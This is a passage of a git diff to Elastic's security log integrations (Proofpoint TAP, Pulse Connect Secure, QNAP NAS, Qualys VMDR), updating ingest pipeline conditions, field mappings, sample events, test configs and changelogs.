ctx.proofpoint_tap?.message_delivered?.message_parts != null && ctx.proofpoint_tap.message_delivered.message_parts instanceof List + if: ctx.proofpoint_tap?.message_delivered?.message_parts instanceof List - foreach: field: proofpoint_tap.message_delivered.message_parts processor: @@ -337,7 +337,7 @@ processors: target_field: _ingest._value.sandbox_status ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.message_parts != null && ctx.proofpoint_tap.message_delivered.message_parts instanceof List + if: ctx.proofpoint_tap?.message_delivered?.message_parts instanceof List - convert: field: json.messageSize target_field: proofpoint_tap.message_delivered.message_size @@ -403,7 +403,7 @@ processors: target_field: _ingest._value.campaign_id ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -412,7 +412,7 @@ processors: target_field: _ingest._value.threat.artifact ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -421,7 +421,7 @@ processors: target_field: _ingest._value.threat.id ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -430,7 +430,7 @@ processors: target_field: _ingest._value.threat.status ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -441,7 +441,7 @@ processors: formats: - ISO8601 ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -449,7 +449,7 @@ processors: field: _ingest._value.threatTime ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -458,7 +458,7 @@ processors: target_field: _ingest._value.threat.type ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_delivered.threat_info_map processor: @@ -467,10 +467,10 @@ processors: target_field: _ingest._value.threat.url ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_delivered?.threat_info_map != null && ctx.proofpoint_tap.message_delivered.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_delivered?.threat_info_map instanceof List - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - remove: diff --git a/packages/proofpoint_tap/data_stream/message_delivered/fields/ecs.yml b/packages/proofpoint_tap/data_stream/message_delivered/fields/ecs.yml index 06421df3981..0bdb1f5ebba 100644 --- a/packages/proofpoint_tap/data_stream/message_delivered/fields/ecs.yml +++ b/packages/proofpoint_tap/data_stream/message_delivered/fields/ecs.yml @@ -6,6 +6,8 @@ name: email.attachments.file.hash.md5 - external: ecs name: email.attachments.file.hash.sha256 +- external: ecs + name: email.attachments.file.mime_type - external: ecs name: email.attachments.file.name - external: ecs diff --git a/packages/proofpoint_tap/docs/README.md b/packages/proofpoint_tap/docs/README.md index e83ca7d69c3..ff7779d1785 100644 --- a/packages/proofpoint_tap/docs/README.md +++ b/packages/proofpoint_tap/docs/README.md @@ -503,11 +503,11 @@ An example event for `message_blocked` looks as following: { "@timestamp": "2021-11-25T09:10:00.050Z", "agent": { - "ephemeral_id": "c84bcbe5-ed0f-4c89-a9c4-8b21738f93d2", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "2738078c-875f-4284-984f-5858cbba75c9", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "data_stream": { "dataset": "proofpoint_tap.message_blocked", @@ -518,9 +518,9 @@ An example event for `message_blocked` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "email": { "attachments": [ @@ -577,9 +577,9 @@ An example event for `message_blocked` looks as following: "category": [ "email" ], - "created": "2023-09-22T17:33:59.847Z", + "created": "2024-04-03T23:27:42.516Z", "dataset": "proofpoint_tap.message_blocked", - "ingested": "2023-09-22T17:34:02Z", + "ingested": "2024-04-03T23:27:46Z", "kind": "event", "original": "{\"GUID\":\"x11xxxx1-12f9-111x-x12x-1x1x123456xx\",\"QID\":\"x2XXxXXX111111\",\"ccAddresses\":[\"abc@example.com\"],\"clusterId\":\"pharmtech_hosted\",\"completelyRewritten\":\"true\",\"fromAddress\":\"abc@example.com\",\"headerCC\":\"\\\"Example Abc\\\" \\u003cabc@example.com\\u003e\",\"headerFrom\":\"\\\"A. Bc\\\" \\u003cabc@example.com\\u003e\",\"headerReplyTo\":null,\"headerTo\":\"\\\"Aa Bb\\\" \\u003caa.bb@example.com\\u003e; \\\"Hey Hello\\\" \\u003chey.hello@example.com\\u003e\",\"impostorScore\":0,\"malwareScore\":100,\"messageID\":\"12345678912345.12345.mail@example.com\",\"messageParts\":[{\"contentType\":\"text/plain\",\"disposition\":\"inline\",\"filename\":\"text.txt\",\"md5\":\"b10a8db164e0754105b7a99be72e3fe5\",\"oContentType\":\"text/plain\",\"sandboxStatus\":\"unsupported\",\"sha256\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\"},{\"contentType\":\"application/pdf\",\"disposition\":\"attached\",\"filename\":\"text.pdf\",\"md5\":\"b10a8db164e0754105b7a99be72e3fe5\",\"oContentType\":\"application/pdf\",\"sandboxStatus\":\"threat\",\"sha256\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\"}],\"messageTime\":\"2021-11-25T09:10:00.050Z\",\"modulesRun\":[\"pdr\",\"sandbox\",\"spam\",\"urldefense\"],\"phishScore\":46,\"policyRoutes\":[\"default_inbound\",\"executives\"],\"quarantineFolder\":\"Attachment Defense\",\"quarantineRule\":\"module.sandbox.threat\",\"recipient\":[\"example.abc@example.com\",\"hey.hello@example.com\"],\"replyToAddress\":null,\"sender\":\"x99x7x5580193x6x51x597xx2x0210@example.com\",\"senderIP\":\"175.16.199.1\",\"spamScore\":4,\"subject\":\"Please find a totally safe invoice attached.\",\"threatsInfoMap\":[{\"campaignId\":\"46x01x8x-x899-404x-xxx9-111xx393d1x7\",\"classification\":\"MALWARE\",\"threat\":\"a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e\",\"threatId\":\"2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx\",\"threatStatus\":\"active\",\"threatTime\":\"2021-11-25T09:10:00.050Z\",\"threatType\":\"ATTACHMENT\",\"threatUrl\":\"https://www.example.com/?name=john\"},{\"campaignId\":\"46x01x8x-x899-404x-xxx9-111xx393d1x7\",\"classification\":\"MALWARE\",\"threat\":\"example.com\",\"threatId\":\"3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx\",\"threatTime\":\"2021-07-20T05:00:00.050Z\",\"threatType\":\"URL\",\"threatUrl\":\"https://www.example.com/?name=john\"}],\"toAddresses\":[\"example.abc@example.com\",\"hey.hello@example.com\"],\"xmailer\":\"Spambot v2.5\"}", "type": [ @@ -639,23 +639,23 @@ An example event for `message_blocked` looks as following: "classification": "MALWARE", "threat": { "artifact": "a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e", + "id": "2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx", "status": "active", "time": "2021-11-25T09:10:00.050Z", "type": "ATTACHMENT", "url": "https://www.example.com/?name=john" - }, - "threatId": "2xxx740f143fc1aa4c1cd0146d334x5593b1428x6x062b2c406e5efe8xxx95xx" + } }, { "campaign_id": "46x01x8x-x899-404x-xxx9-111xx393d1x7", "classification": "MALWARE", "threat": { "artifact": "example.com", + "id": "3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx", "time": "2021-07-20T05:00:00.050Z", "type": "URL", "url": "https://www.example.com/?name=john" - }, - "threatId": "3xx97xx852c66a7xx761450xxxxxx9f4ffab74715b591294f78b5e37a76481xx" + } } ], "to_addresses": [ @@ -694,7 +694,6 @@ An example event for `message_blocked` looks as following: "proofpoint_tap-message_blocked" ] } - ``` **Exported fields** @@ -722,6 +721,7 @@ An example event for `message_blocked` looks as following: | email.attachments | A list of objects describing the attachment files sent along with an email message. | nested | | email.attachments.file.hash.md5 | MD5 hash. | keyword | | email.attachments.file.hash.sha256 | SHA256 hash. | keyword | +| email.attachments.file.mime_type | The MIME media type of the attachment. This value will typically be extracted from the `Content-Type` MIME header field. | keyword | | email.attachments.file.name | Name of the attachment file including the file extension. | keyword | | email.cc.address | The email address of CC recipient | keyword | | email.content_type | Information about how the message is to be displayed. Typically a MIME type. | keyword | @@ -962,6 +962,7 @@ An example event for `message_delivered` looks as following: | email.attachments | A list of objects describing the attachment files sent along with an email message. | nested | | email.attachments.file.hash.md5 | MD5 hash. | keyword | | email.attachments.file.hash.sha256 | SHA256 hash. | keyword | +| email.attachments.file.mime_type | The MIME media type of the attachment. This value will typically be extracted from the `Content-Type` MIME header field. | keyword | | email.attachments.file.name | Name of the attachment file including the file extension. | keyword | | email.cc.address | The email address of CC recipient | keyword | | email.content_type | Information about how the message is to be displayed. Typically a MIME type. | keyword | diff --git a/packages/proofpoint_tap/manifest.yml b/packages/proofpoint_tap/manifest.yml index 0a3c853f630..13834a77d87 100644 --- a/packages/proofpoint_tap/manifest.yml +++ b/packages/proofpoint_tap/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: proofpoint_tap title: Proofpoint TAP -version: "1.16.2" +version: "1.18.0" description: Collect logs from Proofpoint TAP with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - email_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/proofpoint_tap-screenshot.png title: Proofpoint TAP blocked clicks dashboard screenshot @@ -51,6 +51,7 @@ policy_templates: title: Secret Key description: Secret Key for the Basic Authentication. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/pulse_connect_secure/changelog.yml b/packages/pulse_connect_secure/changelog.yml index 850bbb4487c..579b9998ec3 100644 --- a/packages/pulse_connect_secure/changelog.yml +++ b/packages/pulse_connect_secure/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.19.1" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9587 +- version: "1.19.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 +- version: "1.18.3" + changes: + - description: Fix duplicate session field + type: bugfix + link: https://github.com/elastic/integrations/pull/9107 - version: "1.18.2" changes: - description: Changed owners @@ -8,7 +23,7 @@ changes: - description: Handle session token in vpn log type: bugfix - link: https://github.com/elastic/integrations/pull/8434 + link: https://github.com/elastic/integrations/pull/8873 - version: 1.18.0 changes: - description: ECS version updated to 8.11.0. diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json index bbd6b0e503a..b0e78a041b5 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json @@ -1171,7 +1171,10 @@ "pulse_secure": { "realm": "Admin SSO", "role": ".Administrators", - "session": "64e62c265e" + "session": { + "id": "sidbe3ce20a68202d1b91a4be7060b78c4a2825ce9100000000", + "id_short": "64e62c265e" + } }, "source": { "address": "89.160.20.156", diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tcp-config.yml index 69185dd8402..68c1f03dd66 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -6,3 +6,5 @@ data_stream: syslog_host: 0.0.0.0 syslog_port: 9515 preserve_original_event: true +assert: + hit_count: 9 diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tls-config.yml b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tls-config.yml index 8e9ede384ce..012cae649ae 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tls-config.yml +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-tls-config.yml @@ -57,3 +57,5 @@ data_stream: BdcwL671AnnDY3GUxcmX7n8/E4lFwQEf5G4IbKa+/fIm4y4wzkINHYnCeTvVPHUZ rcZR4kw7O4cWsLR4NHJBosUVoaeoCizBB6xLREqISxIZuHKuEcYsRA== -----END RSA PRIVATE KEY----- +assert: + hit_count: 9 diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-udp-config.yml index 0753740e71f..0a598538ec2 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/system/test-udp-config.yml @@ -6,3 +6,5 @@ data_stream: syslog_host: 0.0.0.0 syslog_port: 9514 preserve_original_event: true +assert: + hit_count: 9 diff --git a/packages/pulse_connect_secure/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/pulse_connect_secure/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 7d18624e44e..ace8572d9fd 100644 --- a/packages/pulse_connect_secure/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/pulse_connect_secure/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -21,7 +21,7 @@ processors: - grok: field: event.original patterns: - - '^(<%{NONNEGINT:log.syslog.priority:long}>%{NUMBER}?|%{SYSLOGTIMESTAMP} %{SYSLOGHOST:host.hostname} %{INT}) %{TIMESTAMP_ISO8601:_tmp.timestamp} (%{IP:observer.ip}|%{HOSTNAME:observer.hostname}) PulseSecure: - - - %{DATE2} - %{SYSLOGHOST:observer.name} - \[%{IPORHOST:client.address}\] (%{DATA}::)?(%{HOSTNAME:user.domain}\\)?%{USERNAME:user.name}?(@%{USERNAME:user.domain})?\(%{DATA:pulse_secure.realm}?\)\[%{DATA:pulse_secure.role}\](?::?\[%{DATA:pulse_secure.session}\])? - %{GREEDYDATA:message}' + - '^(<%{NONNEGINT:log.syslog.priority:long}>%{NUMBER}?|%{SYSLOGTIMESTAMP} %{SYSLOGHOST:host.hostname} %{INT}) %{TIMESTAMP_ISO8601:_tmp.timestamp} (%{IP:observer.ip}|%{HOSTNAME:observer.hostname}) PulseSecure: - - - %{DATE2} - %{SYSLOGHOST:observer.name} - \[%{IPORHOST:client.address}\] (%{DATA}::)?(%{HOSTNAME:user.domain}\\)?%{USERNAME:user.name}?(@%{USERNAME:user.domain})?\(%{DATA:pulse_secure.realm}?\)\[%{DATA:pulse_secure.role}\](?::?\[%{DATA:pulse_secure.session.id_short}\])? - %{GREEDYDATA:message}' pattern_definitions: TIMESTAMP_ISO8601: '%{YEAR}-%{MONTHNUM}-%{MONTHDAY}[T ]%{HOUR}:?%{MINUTE}(?::?%{SECOND})?%{ISO8601_TIMEZONE:event.timezone}?' DATE2: '%{YEAR}-%{MONTHNUM}-%{MONTHDAY} %{HOUR}:?%{MINUTE}(?::?%{SECOND})?' @@ -62,7 +62,7 @@ processors: - '^Primary authentication %{WORD_tmp.outcome}' - '%{SESSION}' pattern_definitions: - SESSION: \(session:%{SPACE}?%{NOTSPACE:pulse_secure.session.id}\) + SESSION: \(session:%{SPACE}%{NOTSPACE:pulse_secure.session.id}\) ignore_failure: true - lowercase: field: network.type diff --git a/packages/pulse_connect_secure/data_stream/log/fields/fields.yml b/packages/pulse_connect_secure/data_stream/log/fields/fields.yml index 563d9763530..1c1ed71b83c 100644 --- a/packages/pulse_connect_secure/data_stream/log/fields/fields.yml +++ b/packages/pulse_connect_secure/data_stream/log/fields/fields.yml @@ -12,5 +12,5 @@ type: keyword description: >- test -- name: pulse_secure.session +- name: pulse_secure.session.id_short type: keyword diff --git a/packages/pulse_connect_secure/data_stream/log/sample_event.json b/packages/pulse_connect_secure/data_stream/log/sample_event.json index 06f1780a877..5bebefb2850 100644 --- a/packages/pulse_connect_secure/data_stream/log/sample_event.json +++ b/packages/pulse_connect_secure/data_stream/log/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-10-19T09:10:35.000+02:00", "agent": { - "ephemeral_id": "dbefdcf7-8da3-42ce-a1dd-919d2f3e0611", - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "ephemeral_id": "f5012eed-664a-4430-85b2-b8c48267837e", + "id": "1b313b92-040f-43af-8905-5b86b2755044", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.11.4" }, "client": { "address": "89.160.20.156", @@ -38,16 +38,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "id": "1b313b92-040f-43af-8905-5b86b2755044", "snapshot": false, - "version": "8.9.0" + "version": "8.11.4" }, "event": { "agent_id_status": "verified", "category": "network", "created": "2021-10-19T09:10:35.000+02:00", "dataset": "pulse_connect_secure.log", - "ingested": "2023-08-07T18:48:45Z", + "ingested": "2024-02-09T13:09:18Z", "kind": "event", "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "outcome": "success", @@ -61,7 +61,7 @@ }, "log": { "source": { - "address": "192.168.176.4:55846" + "address": "192.168.176.4:39024" } }, "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", @@ -123,4 +123,4 @@ "version": "10" } } -} +} \ No newline at end of file diff --git a/packages/pulse_connect_secure/docs/README.md b/packages/pulse_connect_secure/docs/README.md index 1f8425cb535..497fc80f28e 100644 --- a/packages/pulse_connect_secure/docs/README.md +++ b/packages/pulse_connect_secure/docs/README.md @@ -10,11 +10,11 @@ An example event for `log` looks as following: { "@timestamp": "2021-10-19T09:10:35.000+02:00", "agent": { - "ephemeral_id": "dbefdcf7-8da3-42ce-a1dd-919d2f3e0611", - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "ephemeral_id": "f5012eed-664a-4430-85b2-b8c48267837e", + "id": "1b313b92-040f-43af-8905-5b86b2755044", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.11.4" }, "client": { "address": "89.160.20.156", @@ -47,16 +47,16 @@ An example event for `log` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "id": "1b313b92-040f-43af-8905-5b86b2755044", "snapshot": false, - "version": "8.9.0" + "version": "8.11.4" }, "event": { "agent_id_status": "verified", "category": "network", "created": "2021-10-19T09:10:35.000+02:00", "dataset": "pulse_connect_secure.log", - "ingested": "2023-08-07T18:48:45Z", + "ingested": "2024-02-09T13:09:18Z", "kind": "event", "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "outcome": "success", @@ -70,7 +70,7 @@ An example event for `log` looks as following: }, "log": { "source": { - "address": "192.168.176.4:55846" + "address": "192.168.176.4:39024" } }, "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", @@ -133,7 +133,6 @@ An example event for `log` looks as following: } } } - ``` **Exported fields** @@ -207,8 +206,8 @@ An example event for `log` looks as following: | observer.vendor | Vendor name of the observer. | keyword | | pulse_secure.realm | test | keyword | | pulse_secure.role | test | keyword | -| pulse_secure.session | | keyword | | pulse_secure.session.id | test | keyword | +| pulse_secure.session.id_short | | keyword | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | source.as.organization.name | Organization name. | keyword | diff --git a/packages/pulse_connect_secure/manifest.yml b/packages/pulse_connect_secure/manifest.yml index c558ac5c398..079d716aa4f 100644 --- a/packages/pulse_connect_secure/manifest.yml +++ b/packages/pulse_connect_secure/manifest.yml @@ -1,6 +1,6 @@ name: pulse_connect_secure title: Pulse Connect Secure -version: 1.18.2 +version: 1.19.1 description: Collect logs from Pulse Connect Secure with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: pulse_connect_secure size: 300x70 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: [vpn_security, security] conditions: kibana: diff --git a/packages/qnap_nas/_dev/deploy/docker/docker-compose.yml b/packages/qnap_nas/_dev/deploy/docker/docker-compose.yml index 1fa5feace5c..c2cb58a5865 100644 --- a/packages/qnap_nas/_dev/deploy/docker/docker-compose.yml +++ b/packages/qnap_nas/_dev/deploy/docker/docker-compose.yml @@ -1,20 +1,17 @@ version: '2.3' services: qnap-nas-udp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/*.log qnap-nas-tcp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/*.log qnap-nas-tls: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/*.log diff --git a/packages/qnap_nas/changelog.yml b/packages/qnap_nas/changelog.yml index fbcbddb6343..0e02acd1c84 100644 --- a/packages/qnap_nas/changelog.yml +++ b/packages/qnap_nas/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.20.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.19.1" changes: - description: Changed owners diff --git a/packages/qnap_nas/manifest.yml b/packages/qnap_nas/manifest.yml index eb74baa1beb..ec31ddef81c 100644 --- a/packages/qnap_nas/manifest.yml +++ b/packages/qnap_nas/manifest.yml @@ -1,9 +1,9 @@ name: qnap_nas title: QNAP NAS -version: "1.19.1" +version: "1.20.0" description: Collect logs from QNAP NAS devices with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security"] conditions: kibana: diff --git a/packages/qualys_vmdr/_dev/deploy/docker/files/config.yml b/packages/qualys_vmdr/_dev/deploy/docker/files/config.yml index 48ea839101a..f0107d6eb3f 100644 --- a/packages/qualys_vmdr/_dev/deploy/docker/files/config.yml +++ b/packages/qualys_vmdr/_dev/deploy/docker/files/config.yml @@ -40,22 +40,70 @@ rules: 2023-06-28T09:58:12Z - 91681 + 5555555555 + 197595 + Confirmed + 3 + 0 + + Active + 2021-02-05T04:50:45Z + 2024-03-08T20:15:41Z + 35 + + + + + + + 5393 + 2024-03-08T20:15:41Z + 2024-03-08T20:15:41Z + 2022-12-14T06:52:57Z + 0 + 0 + 0 + 2024-03-08T20:15:41Z + + + 6666666666 + 197597 Confirmed 5 0 - - - + Active - 2023-06-28T06:04:26Z - 2023-07-03T06:23:47Z - 11 - 2023-07-03T06:23:47Z - 2023-07-03T06:25:17Z + 2021-02-05T04:50:45Z + 2024-03-08T20:15:41Z + 95 + + + + + + + + + + + + 5393 + 2024-03-08T20:15:41Z + 2024-03-08T20:15:41Z + 2022-12-14T06:52:57Z 0 0 - 2023-07-03T06:25:17Z + 0 + 2024-03-08T20:15:41Z @@ -82,6 +130,16 @@ rules: <![CDATA[HTTP Security Header Not Detected]]> + + + + + + + + + + CGI 2023-06-29T12:20:46Z 2017-06-05T21:34:49Z diff --git a/packages/qualys_vmdr/changelog.yml b/packages/qualys_vmdr/changelog.yml index e82f1e5af3a..5e0a1a760f9 100644 --- a/packages/qualys_vmdr/changelog.yml +++ b/packages/qualys_vmdr/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "3.0.0" + changes: + - description: Expand documents to map each CVS per vulnerability. + type: enhancement + link: https://github.com/elastic/integrations/pull/9375 +- version: "2.1.0" + changes: + - description: Increase request timeout default and document timeout length warning. + type: enhancement + link: https://github.com/elastic/integrations/pull/9371 +- version: "2.0.0" + changes: + - description: Expand documents to map each vulnerability per host. + type: enhancement + link: https://github.com/elastic/integrations/pull/9293 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log index e95b4711ea2..f738c4e6b3c 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log @@ -1,7 +1,7 @@ -{"NETBIOS": "EXCHB10","NETWORK_ID": 0,"IPV6":"0.0.0.0","OS_CPE":"xyz","EC2_INSTANCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_RESOURCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_SERVICE": "EC2","CLOUD_PROVIDER": "AWS","QG_HOSTID": "44e2cf13-xxxx-48b9-xxxx-de489547754d","METADATA": {"EC2": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}, "GOOGLE": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}, "AZURE": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}},"CLOUD_PROVIDER_TAGS": {"CLOUD_TAG": [{"NAME": "Name","VALUE": "allocator-dnt-frozen-i3en-2xl-v1-a","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z"}]}, "IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": 